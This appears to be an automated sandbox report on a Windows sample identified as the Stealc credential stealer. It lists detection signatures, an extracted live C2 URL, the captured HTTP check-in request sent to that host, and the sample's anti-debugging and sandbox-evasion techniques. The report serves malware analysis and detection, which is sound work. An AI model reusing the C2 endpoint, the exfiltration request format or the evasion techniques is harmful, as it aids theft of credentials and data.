
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523127
MD5: e12dff26d257800a0f411dda1fdb521f
SHA1: ed660b5a175dce979ca5e77f13d2e89b2c8aaadc
SHA256: e082f507be5674e4813a6f32759c2551bfedea8e298082cab225b787b6e89d60
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3168 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E12DFF26D257800A0F411DDA1FDB521F)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 3168 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 3168 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.fb0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T06:56:59.379515+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.fb0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php0 | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpW | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 43%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00FBC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00FB9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00FB7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00FB9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00FC8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00FC38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FC4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FBDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00FBE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00FC4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00FBED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FB16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FBF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00FC3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00FBBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00FBDE10

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH | Host: 185.215.113.37 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 43 41 44 32 37 46 37 33 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a | Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="hwid"B3CAD27F7324796922796------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="build"doma------IIIECAAKECFHIECBKJDH--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00FB4880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH | Host: 185.215.113.37 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 43 41 44 32 37 46 37 33 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a | Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="hwid"B3CAD27F7324796922796------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="build"doma------IIIECAAKECFHIECBKJDH--
Source: file.exe, 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1713881816.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
Source: file.exe, 00000000.00000002.1713881816.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124611F | 0_2_0124611F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0144A102 | 0_2_0144A102
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130F1B8 | 0_2_0130F1B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137999B | 0_2_0137999B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137E9E5 | 0_2_0137E9E5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01225806 | 0_2_01225806
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013888E6 | 0_2_013888E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01374B43 | 0_2_01374B43
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137B39E | 0_2_0137B39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01347B98 | 0_2_01347B98
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133E2E6 | 0_2_0133E2E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132DAEF | 0_2_0132DAEF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01383AE6 | 0_2_01383AE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F42D8 | 0_2_012F42D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013765B6 | 0_2_013765B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01385DE7 | 0_2_01385DE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01279E67 | 0_2_01279E67
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00FB45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: mbunfolu ZLIB complexity 0.9947512735705596
Source: file.exe, 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00FC8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00FC3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\MZENU7VC.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 43%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1840128 > 1048576
Source: file.exe | Static PE information: Raw size of mbunfolu is bigger than: 0x100000 < 0x19b000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mbunfolu:EW;qktpvyhd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mbunfolu:EW;qktpvyhd:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00FC9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cade3 should be: 0x1c4d0a
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: mbunfolu
Source: file.exe | Static PE information: section name: qktpvyhd
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0142C168 push ebx; mov dword ptr [esp], ecx | 0_2_0142C1AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0141316F push ebp; mov dword ptr [esp], edx | 0_2_01413164
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0141316F push ebx; mov dword ptr [esp], eax | 0_2_014131A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124611F push 73138423h; mov dword ptr [esp], esi | 0_2_01246145
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124611F push ecx; mov dword ptr [esp], ebp | 0_2_0124619F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124611F push ebp; mov dword ptr [esp], ecx | 0_2_012461A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124611F push 7381BCCCh; mov dword ptr [esp], esi | 0_2_0124626F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0124611F push ebp; mov dword ptr [esp], esi | 0_2_012462B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0144A102 push esi; mov dword ptr [esp], eax | 0_2_0144A235
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0144A102 push edi; mov dword ptr [esp], edx | 0_2_0144A291
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0144A102 push esi; mov dword ptr [esp], ecx | 0_2_0144A2EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0144A102 push 54A12CFEh; mov dword ptr [esp], ebx | 0_2_0144A395
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01422905 push 44371931h; mov dword ptr [esp], ecx | 0_2_01422929
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0141B91D push 093A3CD1h; mov dword ptr [esp], esi | 0_2_0141B949
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140011E push ecx; mov dword ptr [esp], 63E29DD9h | 0_2_014001CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140011E push eax; mov dword ptr [esp], ebp | 0_2_01400264
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140011E push edi; mov dword ptr [esp], edx | 0_2_01400270
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0146A13E push ebx; mov dword ptr [esp], ecx | 0_2_0146A142
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139D1B8 push ebx; mov dword ptr [esp], esi | 0_2_0139F0DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014331C5 push 71402349h; mov dword ptr [esp], ecx | 0_2_014331EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130F1B8 push eax; mov dword ptr [esp], edx | 0_2_0130F268
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014279CF push ebx; mov dword ptr [esp], edx | 0_2_014279FF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014279CF push esi; mov dword ptr [esp], eax | 0_2_01427A1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0145B9DF push 06529C62h; mov dword ptr [esp], esi | 0_2_0145BA10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0145B9DF push ecx; mov dword ptr [esp], edi | 0_2_0145BA54
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0142C9DE push ecx; mov dword ptr [esp], esi | 0_2_0142CA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0142C9DE push 13DE3139h; mov dword ptr [esp], ebx | 0_2_0142CAC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013F219F push edx; mov dword ptr [esp], 72D047CFh | 0_2_013F220E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01392998 push edi; mov dword ptr [esp], ebp | 0_2_01392A72
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013E119D push edx; mov dword ptr [esp], esi | 0_2_013E11DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137999B push esi; mov dword ptr [esp], ebx | 0_2_013799A9
Source: file.exe | Static PE information: section name: mbunfolu entropy: 7.952881013739973

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00FC9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13367
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138D7EE second address: 138D7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138D7F8 second address: 138D804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138D804 second address: 138D81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18F9Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138D81C second address: 138D820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1372B0B second address: 1372B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA8h 0x00000007 jc 00007F65A4C18F96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1372B2D second address: 1372B62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 jmp 00007F65A45025A8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65A45025A1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1372B62 second address: 1372B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Eh 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnc 00007F65A4C18F96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138CA03 second address: 138CA0F instructions: 0x00000000 rdtsc 0x00000002 js 00007F65A450259Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138CB46 second address: 138CB5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Ah 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138CF50 second address: 138CF64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F65A4502596h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F83B second address: 138F840 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
